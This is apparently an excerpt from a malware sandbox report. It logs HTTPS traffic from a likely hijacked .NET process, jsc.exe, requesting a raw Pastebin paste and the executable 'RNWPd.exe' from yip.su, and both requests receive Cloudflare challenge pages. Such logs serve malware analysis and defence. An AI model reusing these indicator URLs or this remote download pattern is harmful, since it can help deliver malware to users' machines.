                                    2024-08-17 22:11:23 UTC1369INData Raw: 33 65 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3e11<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:11:23 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:11:23 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:11:23 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:11:23 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:11:23 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:11:23 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:11:23 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 33 38 34 39 39 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 66 65 39 35 61 63 62 37 63 37 63 27 2c 63 48 61 73 68 3a 20 27 62 31 66 35 36 64 66 66 61 64 38 32 35 39 31 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 48 41 66 5a 64 43 38 45 68 41 61 51 55 58 41 6f 56 4f 6e 39 37 53 4d 4e 7a 56 67 78 5f 46 36 41 7a 68 72 74 5f 57 42 47 56 35 49 2d 31 37 32 33 39 33 32 36 38 33 2d 30 2e 30 2e 31 2e 31 2d 34 31 35 38 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '38499',cRay: '8b4cffe95acb7c7c',cHash: 'b1f56dffad82591',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=HAfZdC8EhAaQUXAoVOn97SMNzVgx_F6Azhrt_WBGV5I-1723932683-0.0.1.1-4158",cFPWv: 'g',cTTim
                                    2024-08-17 22:11:23 UTC1369INData Raw: 61 72 36 4a 46 4c 51 75 61 61 74 66 7a 69 54 53 72 5f 71 71 5a 46 47 61 76 76 30 54 64 76 56 47 71 52 47 68 5f 7a 61 43 78 56 41 59 49 72 69 53 53 65 46 36 30 4f 39 65 54 31 67 65 4c 67 62 6d 57 53 45 58 79 4c 36 44 6f 39 4e 47 56 57 53 43 64 6f 64 51 47 6d 41 48 62 5a 4d 76 57 50 30 6f 42 38 46 75 4f 4a 4e 2e 46 6e 32 6c 74 33 6f 54 75 49 78 5f 59 73 36 53 62 33 76 78 74 6e 77 77 77 4d 6e 7a 59 73 47 2e 32 49 49 6a 4a 67 31 6e 48 6a 7a 66 41 44 44 53 35 41 36 6e 4b 67 52 52 59 42 57 38 64 58 49 66 4d 6c 68 50 6c 79 75 47 6e 32 69 4f 51 6a 39 43 6c 61 36 5a 56 59 41 48 44 68 78 53 67 78 71 77 79 43 4c 49 69 4a 5f 64 6f 76 77 45 35 58 77 30 44 31 31 79 75 4d 71 48 31 39 79 4e 54 6c 76 39 6e 78 4a 56 6f 53 6c 61 52 51 78 49 51 76 52 5f 79 44 57 48 42 6b 73
                                    Data Ascii: ar6JFLQuaatfziTSr_qqZFGavv0TdvVGqRGh_zaCxVAYIriSSeF60O9eT1geLgbmWSEXyL6Do9NGVWSCdodQGmAHbZMvWP0oB8FuOJN.Fn2lt3oTuIx_Ys6Sb3vxtnwwwMnzYsG.2IIjJg1nHjzfADDS5A6nKgRRYBW8dXIfMlhPlyuGn2iOQj9Cla6ZVYAHDhxSgxqwyCLIiJ_dovwE5Xw0D11yuMqH19yNTlv9nxJVoSlaRQxIQvR_yDWHBks


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    70192.168.2.549797104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:28 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:28 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:11:28 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4d000958ba43a9-EWR
                                    2024-08-17 22:11:28 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:11:28 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:11:28 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:11:28 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:11:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    71192.168.2.549798188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:29 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:29 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:11:29 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:11:29 UTC679INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 52 4b 70 35 71 30 6b 53 73 51 50 31 64 4d 51 4b 63 31 6f 2f 6c 74 56 46 76 7a 4c 6f 70 72 55 72 37 53 47 4b 62 4d 47 7a 2f 55 55 39 75 45 36 35 35 78 38 4d 4c 41 6f 79 37 53 48 37 37 68 72 4b 54 66 79 57 63 44 32 65 33 47 47 47 78 6d 6e 6e 33 54 75 4b 62 51 70 33 41 75 6a 54 74 70 55 41 62 52 30 6b 2f 43 74 46 76 62 41 3d 24 54 7a 33 48 43 47 44 43 7a 78 78 44 4f 68 50 7a 79 6c 36 36 6d 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: RKp5q0kSsQP1dMQKc1o/ltVFvzLoprUr7SGKbMGz/UU9uE655x8MLAoy7SH77hrKTfyWcD2e3GGGxmnn3TuKbQp3AujTtpUAbR0k/CtFvbA=$Tz3HCGDCzxxDOhPzyl66mA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:11:29 UTC1369INData Raw: 33 65 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3e11<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:11:29 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:11:29 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
